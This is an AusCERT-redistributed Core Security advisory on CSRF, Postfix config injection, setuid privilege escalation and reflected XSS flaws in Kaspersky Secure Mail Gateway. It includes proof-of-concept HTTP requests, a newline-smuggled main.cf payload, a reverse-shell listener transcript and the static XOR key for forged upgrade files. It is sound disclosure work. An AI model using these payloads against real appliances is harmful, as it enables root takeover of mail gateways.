ESB-2018.0404 - [Appliance] Kaspersky Secure Mail Gateway: Multiple vulnerabilities 2018-02-09

Printable version
PGP/GPG verifiable version

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2018.0404
          Kaspersky Secure Mail Gateway Multiple Vulnerabilities
                              9 February 2018

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Kaspersky Secure Mail Gateway
Publisher:         Kaspersky
Operating System:  Network Appliance
Impact/Access:     Root Compromise            -- Existing Account            
                   Cross-site Request Forgery -- Remote with User Interaction
                   Cross-site Scripting       -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2018-6291 CVE-2018-6290 CVE-2018-6289
                   CVE-2018-6288  

Original Bulletin: 
   https://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities

- --------------------------BEGIN INCLUDED TEXT--------------------

Kaspersky Secure Mail Gateway Multiple Vulnerabilities


1. Advisory Information

Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities

Advisory ID: CORE-2017-0010

Advisory URL: http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities

Date published: 2018-02-01

Date of last update: 2018-02-01

Vendors contacted: Kaspersky Lab

Release mode: Coordinated release


2. Vulnerability Information

Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of Special
Elements in Output Used by a Downstream Component [CWE-74], Improper Privilege
Management [CWE-269], Improper Neutralization of Input During Web Page
Generation [CWE-79]

Impact: Code execution

Remotely Exploitable: Yes

Locally Exploitable: Yes

CVE Name: CVE-2018-6288, CVE-2018-6289, CVE-2018-6290, CVE-2018-6291


3. Vulnerability Description

- From Kaspersky Labs website:

Kaspersky Secure Mail Gateway [1] gives you a fully integrated email system;
mail security solution - including anti-spam, anti-malware, anti-phishing and
more - in a single virtual appliance. It's easy to install and manage - so you
save time on day-to-day mail and mail security tasks, while we deliver
award-winning security that helps you keep your business safe and boost user
productivity.

Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web Management
Console. It is possible for a remote attacker to abuse these vulnerabilities and
gain command execution as root.


4. Vulnerable Packages

    Kaspersky Secure Mail Gateway 1.1.0.379

Other products and versions might be affected, but they were not tested.


5. Vendor Information, Solutions and Workarounds

Kaspersky Labs published the following advisory

    https://support.kaspersky.com/vulnerability.aspx?el=12430#010218


6. Credits

These vulnerabilities were discovered and researched by Leandro Barragan from
Core Security Consulting Services. The publication of this advisory was
coordinated by Alberto Solino from Core Advisories Team.


7. Technical Description / Proof of Concept Code

Kaspersky Secure Mail Gateway is a virtual appliance designed to be deployed
inside the organization's network infrastructure. It comes bundled with a Web
Management Console to monitor the application status and manage its operation.

This Management Console provides no cross-site request forgery protection
site-wide, which could result in administrative account takeover as shown in
7.1.

In addition, an attacker who manages to get access to the Web Console could gain
command execution as root (7.2) by injecting arbitrary content into the
appliance's Postfix configuration.

It is also possible to elevate privileges from kluser to root (7.3) by abusing a
setuid binary shipped with the appliance, which executes a script located on an
attacker-controlled location with root privileges.

Apart from this, a reflected cross-site scripting vulnerability (7.4) was found
which affects the Management Console.


7.1. Cross-site Request Forgery leading to Administrative account takeover

[CVE-2018-6288] There are no Anti-CSRF tokens in any forms on the Web interface.
This would allow an attacker to submit authenticated requests when an
authenticated user browses an attacker-controlled domain.

The "Import Application Settings" feature is particularly interesting because it
allows users to restore a backup file that overwrites the appliance's
configuration.

A settings backup file contains five zlib segments:

$ binwalk KSMG_settings.kz

DECIMAL       HEXADECIMAL     DESCRIPTION
- --------------------------------------------------------------------------------
16            0x10            Zlib compressed data, default compression
39            0x27            Zlib compressed data, default compression
2242          0x8C2           Zlib compressed data, default compression
2268          0x8DC           Zlib compressed data, default compression
3072          0xC00           Zlib compressed data, default compression


The last segment is a compressed backup of /var/opt/kaspersky/klms/db/passwd,
which contains a list of usernames, passwords, and profiles, for example:

# cat /var/opt/kaspersky/klms/db/passwd
Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin


An attacker can craft a backup file that contains its own passwd file, and then
submit it by abusing the CSRF vulnerability.

The appliance then overwrites the original passwd file giving the attacker
access to Administrator account.

The following proof-of-concept request restores only account information in
order to avoid changing appliance's current configuration. Please note that the
file contents were removed to make it more readable.

POST /ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------3463969741915053213976213766
Content-Length: 3935
Referer: https://server/ksmg/
Cookie: SID=7362ED7771E7213F0EFCE85B430E240D
Connection: close
Upgrade-Insecure-Requests: 1

- -----------------------------3463969741915053213976213766
Content-Disposition: form-data; name="data"

{"importSections":{"importWebPasswords":true,"importMachineIndependent":false,"importMachineDependent":false,"machineDependent":{"importTraces":false,"importProxy":false,"importAuth":false,"importBackup":false,"backupImportSection":{"importFileStorage":false},"importScan":false,"scanImportSection":{"importFilterSocket":false},"importUpdater":false,"importQuarantine":false},"importRules":false,"importPersonal":false}}
- -----------------------------3463969741915053213976213766
Content-Disposition: form-data; name="fileContent"; filename="KSMG_settings.kz"
Content-Type: application/octet-stream

[...Tampered configuration file...]
- -----------------------------3463969741915053213976213766--


7.2. Configuration file injection leading to Code Execution as Root

[CVE-2018-6289] Using the Web Management Console it is possible to add a "BCC
Address for all Messages". This configuration parameter is written verbatim to
the appliance's Postfix main.cf configuration file.

By adding LF characters to this parameter, it is possible to inject a
configuration parameter that would allow an attacker to execute arbitrary
commands on the appliance as root.

The following request injects arbitrary configuration settings into
/etc/postfix/main.cf:

POST /ksmg/cgi-bin/klwi?action=setMtaSettings HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://server/ksmg/
Content-Length: 1541
Cookie: SID=7362ED7771E7213F0EFCE85B430E240D
Connection: close

data={"alwaysBcc":"test@test.com\nmulti_instance_enable=yes\nmulti_instance_wrapper=\/tmp\/klms-appliance-upgrade\/upgrade.py\nmulti_instance_directories=\/tmp","mydomain":"localdomain",[...SNIPPED...]


The resulting file looks as follows:

$ cat /etc/postfix/main.cf

...
always_bcc = test@test.com
multi_instance_enable=yes
multi_instance_wrapper=/tmp/klms-appliance-upgrade/upgrade.py
multi_instance_directories=/tmp
...


After that request is sent, postfix is automatically restarted, and the file
pointed by multi_instance_wrapper is executed. In this proof-of-concept that
parameter points to a python reverse shell:

$ nc -lvvvp 1080
Listening on [0.0.0.0] (family 0, port 1080)
Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 42776)
sh: no job control in this shell
sh-4.1# id
id
uid=0(root) gid=497(klusers) groups=497(klusers),90(postdrop)


Please note that while abusing this behavior would allow attackers to execute
any binary on the system, no arguments can be passed to it. In order to overcome
this we abused another Web Console functionality to upload a python script to
the file system. That procedure is described next.

An attacker can write to /tmp/klms-appliance-upgrade/ using the Web Console
using System Upgrade functionality. This feature takes an upgrade file (i.e. a
KTGZ file), decodes it, and unpacks it on /tmp/klms-appliance-upgrade/.

KTGZ files can be crafted by creating a TAR.GZ file with a malicious upgrade.py
file inside it, and then XORing it with key 0xDF23B1ED. This key is static and
hardcoded on system's binaries.

When this file is uploaded using the Web Console, the upgrade process will fail,
as it lacks Kaspersky signature files. However, the content of the rogue upgrade
file (including the modified upgrade.py file used on this proof-of-concept) will
remain on /tmp/klms-appliance-upgrade/. It is worth noting that file's
permissions are conserved, so we can upload files with the executable bit set.


7.3. Local Privilege Escalation

[CVE-2018-6290] There is a setuid root binary located on
/opt/kaspersky/klms-appliance/libexec/upgrade/:

$ ls -lha /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher
- -rws--x--- 1 root klusers 7,6K sep 24  2015 /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher


This program looks for a python script once executed:

$ /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher
/usr/bin/python: can't open file '/tmp/klms-appliance-upgrade/upgrade.py': [Errno 2] No such file or directory


/tmp/klms-appliance-upgrade/ directory is writeable by kluser by default. If an
attacker manages to run commands on the appliance as kluser, s/he could abuse
this behavior to elevate privileges to root by writing a malicious script on the
aforementioned path and running upgrade_launcher binary.


7.4. Reflected Cross-Site Scripting

[CVE-2018-6291] The callback parameter of the importSettings action method is
vulnerable to cross-site scripting.

https://server/ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5...(1)</script><script>


8. Report Timeline

    2017-09-26: Core Security sent an initial notification to Kaspersky,
    including a draft advisory.

    2017-09-27: Kaspersky answered saying there was nothing in attachment and
    requested the possibility of sending draft advisory as a password protected
    archive.

    2017-09-29: Kaspersky asked again for the draft advisory.

    2017-09-29: Core Security answered saying password protected archive is not
    possible and sent the advisory in text form (inside the mail).

    2017-10-04: Kaspersky acknowledged the reception of the advisory and
    confirmed the vulnerabilities in the product. They said issues will be fixed
    'till the end of November'.

    2017-11-13: Kaspersky informed they had to postpone the release of the patch
    and won't make it to the end of November as originally proposed. They are
    asking to postpone the release to February 1st, 2018

    2017-11-13: Core Security answered acknowledging February 1st 2018 as the
    target publication date of the advisory and fix for the reported issues.

    2018-01-16: Core Security asked final confirmation for February 1st as the
    target publication date and also the CVE-IDs for each one of the
    vulnerabilities found.

    2018-01-18: Kaspersky confirmed February 1st as publication date.

    2018-01-26: Core Security informed our advisory will be published February
    1st at 12pm EST.

    2018-01-30: Kaspersky informed they are waiting CVE-IDs from MITRE and that
    process might take a week long. Proposed postponing publication to February
    8th.

    2018-01-30: Core Security stated that postponing publication would not be
    possible and that the advisory will be published with pending CVE-IDs for
    each one of the vulnerabilities found until Kaspersky provides the final
    IDs. Also asked for a link to the fix to be included in the final advisory.

    2018-01-30: Kaspersky sent the link for downloading latest KSMG version.

    2018-01-30: Core Security acknowledged the information received.

    2018-02-01: Advisory CORE-2017-0010 published.


9. References

[1] https://www.kaspersky.com/small-to-medium-business-security/mail-security-appliance


10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the
future needs and requirements for information security technologies. We conduct
our research in several important areas of computer security including system
vulnerabilities, cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs
regularly publishes security advisories, technical papers, project information
and shared software tools for public use at: http://corelabs.coresecurity.com.


11. About Core Security

Core Security provides companies with the security insight they need to know
who, how, and what is vulnerable in their organization. The company's
threat-aware, identity & access, network security, and vulnerability management
solutions provide actionable insight and context needed to manage security risks
across the enterprise. This shared insight gives customers a comprehensive view
of their security posture to make better security remediation decisions. Better
insight allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if a breach
does occur.

Core Security is headquartered in the USA with offices and operations in South
America, Europe, Middle East and Asia. To learn more, contact Core Security at
(678) 304-4500 or info@coresecurity.com


12. Disclaimer

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018
CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBWnzozox+lLeg9Ub1AQg0vA//UWqI2M6H7he1qkb/5EroHKfd7mHxyFP4
vOovL2pj6ppiMgu02xPzBoX10L7mQxPbgBeCt1rrKat6dTUgXGRPseDkLudNniT8
itwjDVWaBATiWWMuz5IJjYuv0lQSxtEIGUVYkwE8nInxOiF+mIK4xR/ZRkiTux57
fj7+FEMilTOZzo0Xcx/5Q5X0sd4s0dcBP9g5UnHfcYOnPZqJ211IQ3ed2NieEwgk
SegUfOanrkESQcGA2dPjjoQfHdCvaBq+unObRLviRYPWRtvksXS7VTYg4PYHDJ/1
lKYCTvofNMhTuQ1Sa4JHJpnJaPxsIkMtm1h5QaagyBpk/QLT+UvMkYEmiR5DXTzC
Mf1n5u+RGIYhFuFjqxZ7m72aNdPCj0paD5SEi/kGB2deHy1XC51oGFNMPYxbRboM
2rjWuOqJfPyuq0xeFA+MdIFi1xYKIVYw0kKPmPjVdlnocJ+kAlXrkYBV3Ocgzsy0
2E5Ry8ZvvVjfukp9RdvaN/xx3KOexITU0W2YPg47bu4TgPPQRG73rf9SXReB2oLm
85+OqtsFhwLbTXNDfq56Z+v0yxW98SMQVWzF/PdKNPPHYSc1N6DT1t6pbzKrEd5E
RdPRMl2x3X/qozdSvrv7o5jM81eICkcNI6yGUUsbyCBezKJSfpF24htJC0MpEM6n
s/9O+sR5DS8=
=uY6L
-----END PGP SIGNATURE-----

« Back to bulletins